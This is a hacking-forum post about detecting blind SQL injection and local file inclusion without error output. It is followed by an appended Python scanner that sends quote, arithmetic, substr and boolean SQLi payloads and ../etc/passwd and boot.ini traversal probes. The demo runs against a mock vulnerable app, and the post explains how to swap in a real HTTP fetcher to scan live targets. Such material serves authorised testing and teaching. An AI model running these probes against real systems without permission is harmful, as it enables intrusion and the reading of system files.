Hi EZ Members
I have quite good knowledge and some experience in sqli and lfi.
Yet I struggle to turn that into a script. The big question is actually: how do you determine a vulnerability if there is no error output?
What is the fastest way?
I had a few thoughts...
about sqli without error output:
1. numeric input: if id=7 gives the same as id=8-1, there is a good chance of sqli
2. if site=home and site=substring('home',1,4) give the same, there is also a good chance of sqli
about lfi without error output:
1. just try ../.. (...) ../etc/passwd and boot.ini and check for a difference in content length
so the script looks at a specific get/post field:
suppose I need '
1. generate a query with ' at the end of the standard value (if any)
2. search the content for sql errors, php errors, other errors -> exit if yes
3. try something like ' and '1'='1 and see if you get the same output as normal
??
I really don't know how to check this case
suppose I don't need '
4. if numeric, try the subtraction (1.) and if not, try the substring (2.) -> exit if content length is the same as for normal input
and lfi:
5. try passwd and boot.ini and compare content length
6. not vuln, or try some other stuff...
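Here is one way to turn the checklist above into a script, as an added example that is not part of the original post. The target it probes is a constructed mock (an in-memory SQLite database plus a fake file system) that swallows database errors, so the detector has nothing but the response body to go on. The parameter names id/page/file, the substr() probe and the passwd marker are assumptions made for the demo. Besides the ' and '1'='1 check it also sends the complementary '1'='2 condition, so a field the application ignores entirely does not come back as a false positive, and for the traversal probes it uses the "file not found" response as a second baseline next to the normal one.

```python
import posixpath
import re
import sqlite3
from typing import Callable, Dict, List

Fetch = Callable[[Dict[str, str]], str]  # GET/POST params -> response body

# Error text a blind target should NOT leak; if it does, we are done early.
SQL_ERRORS = re.compile(
    r"(You have an error in your SQL syntax|mysql_fetch_|ORA-\d{5}|"
    r"unterminated quoted string|Warning: (?:mysql|pg)_)", re.I)
PASSWD_MARKER = re.compile(r"root:[^:\n]*:0:0:")  # first /etc/passwd line


def with_value(params: Dict[str, str], name: str, value: str) -> Dict[str, str]:
    """Copy of params with one field replaced by the probe value."""
    p = dict(params)
    p[name] = value
    return p


def probe_sqli(fetch: Fetch, params: Dict[str, str], name: str) -> List[str]:
    """Blind SQLi heuristics for one field; returns the findings (empty = nothing)."""
    base_value = params[name]
    base = fetch(params)
    # Steps 1/2: append a quote and look for leaked errors before anything else.
    if SQL_ERRORS.search(fetch(with_value(params, name, base_value + "'"))):
        return ["error-based (database error leaked)"]
    findings = []
    if base_value.isdigit():
        # Numeric context: id=7 and id=8-1 only agree if the DB does the arithmetic.
        # The 9-1 control must differ, otherwise the field is simply ignored.
        n = int(base_value)
        same = fetch(with_value(params, name, f"{n + 1}-1"))
        diff = fetch(with_value(params, name, f"{n + 2}-1"))
        if same == base and diff != base:
            findings.append("numeric context (arithmetic)")
    else:
        # Unquoted string context: substr() evaluated by the DB (assumes MySQL/SQLite syntax);
        # a shorter substring is the control that must change the page.
        probe = fetch(with_value(params, name, f"substr('{base_value}',1,{len(base_value)})"))
        ctrl = fetch(with_value(params, name, f"substr('{base_value}',1,{len(base_value) - 1})"))
        if probe == base and ctrl != base:
            findings.append("unquoted string context (substr)")
        # Quoted string context: a true condition keeps the page, a false one changes it.
        true_body = fetch(with_value(params, name, base_value + "' AND '1'='1"))
        false_body = fetch(with_value(params, name, base_value + "' AND '1'='2"))
        if true_body == base and false_body != base:
            findings.append("quoted string context (boolean)")
    return findings


def probe_lfi(fetch: Fetch, params: Dict[str, str], name: str, max_depth: int = 6) -> Dict[str, bool]:
    """Traversal probes. Maps each payload whose length differs from BOTH baselines
    (normal page, missing file) to whether the passwd marker was actually seen."""
    base = fetch(params)
    missing = fetch(with_value(params, name, "zz_no_such_file_zz"))
    hits = {}
    for depth in range(1, max_depth + 1):
        for target in ("etc/passwd", "boot.ini"):
            payload = "../" * depth + target
            body = fetch(with_value(params, name, payload))
            if len(body) != len(base) and len(body) != len(missing):
                hits[payload] = bool(PASSWD_MARKER.search(body))
    return hits


def make_mock_target() -> Fetch:
    """Constructed vulnerable 'web app' for the demo: concatenated SQL with errors
    swallowed, plus a path-joined include over a fake file system."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)", [(7, "seven"), (8, "eight")])
    db.execute("CREATE TABLE pages (name TEXT, body TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)", [("home", "<p>Welcome</p>"), ("about", "<p>About</p>")])
    fake_fs = {"/var/www/pages/home": "<footer>home</footer>",
               "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"}

    def handle(params: Dict[str, str]) -> str:
        out = ["<html><body>"]
        try:
            if "id" in params:  # numeric, unquoted
                rows = db.execute(f"SELECT name FROM items WHERE id = {params['id']}").fetchall()
                out += [f"<li>{r[0]}</li>" for r in rows]
            if "page" in params:  # string, single-quoted
                rows = db.execute(f"SELECT body FROM pages WHERE name = '{params['page']}'").fetchall()
                out += [r[0] for r in rows]
        except sqlite3.Error:
            pass  # blind: no error text reaches the client
        if "file" in params:
            path = posixpath.normpath("/var/www/pages/" + params["file"])
            out.append(fake_fs.get(path, "<p>not found</p>"))
        out.append("</body></html>")
        return "".join(out)
    return handle


if __name__ == "__main__":
    app = make_mock_target()  # swap in a real HTTP fetcher to scan a live target
    for field, params in (("id", {"id": "7"}), ("page", {"page": "home"}), ("x", {"x": "7"})):
        print(field, probe_sqli(app, params, field))
    print("file", probe_lfi(app, {"file": "home"}, "file"))
```

To point this at a real target, replace `fetch` with a function that sends the request and returns the body. Exact equality only works when the page is stable between requests, so strip timestamps, CSRF tokens and similar dynamic fragments before comparing, and treat the content-length hits without the passwd marker as leads to look at by hand rather than as confirmed findings.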